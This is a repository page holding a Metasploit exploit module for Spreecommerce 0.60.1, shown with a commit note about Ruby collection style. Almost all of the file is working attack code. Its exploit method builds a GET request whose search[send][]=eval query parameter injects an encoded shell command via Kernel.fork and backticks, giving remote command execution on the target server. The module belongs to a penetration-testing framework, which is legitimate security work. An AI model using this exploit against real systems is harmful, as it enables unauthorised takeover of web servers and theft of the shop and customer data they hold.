adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
2e8d19edcf1dfd3ec71e69a63e1107e4e2b7d883
metasploit-gs/modules/exploits/multi/http/spree_search_exec.rb
T
Tod Beardsley c547e84fa7 Prefer Ruby style for single word collections 
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.

This change converts all Payloads to this format if there is more than
one payload to choose from.

It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.

See:
  https://github.com/bbatsov/ruby-style-guide#collections
2013-09-24 12:33:31 -05:00

75 lines
2.2 KiB
Ruby
Raw Blame History

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Spreecommerce 0.60.1 Arbitrary Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
Spreecommerce search. Unvalidated input is called via the
Ruby send method allowing command execution.
},
'Author' => [ 'joernchen <joernchen[at]phenoelit.de>' ], #Phenoelit
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '76011'],
[ 'URL', 'http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/' ],
],
'Privileged' => false,
'Payload' =>
{
'BadChars' => "\x60",
'DisableNops' => true,
'Space' => 31337,
'Compat' =>
{
'PayloadType' => 'cmd',
}
},
'Platform' => %w{ linux unix },
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Oct 05 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "The path to the Spreecommerce main site", "/"]),
], self.class)
end
def exploit
command = Rex::Text.uri_encode(payload.raw, 'hex-all')
res = send_request_raw({
'uri' => normalize_uri(datastore['URI']) + "?search[send][]=eval&search[send][]=Kernel.fork%20do%60#{command}%60end",
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 0.4 ) #short timeout, we don't care about the response
if (res)
print_status("The server returned: #{res.code} #{res.message}")
end
handler
end
end
Reference in New Issue View Git Blame Copy Permalink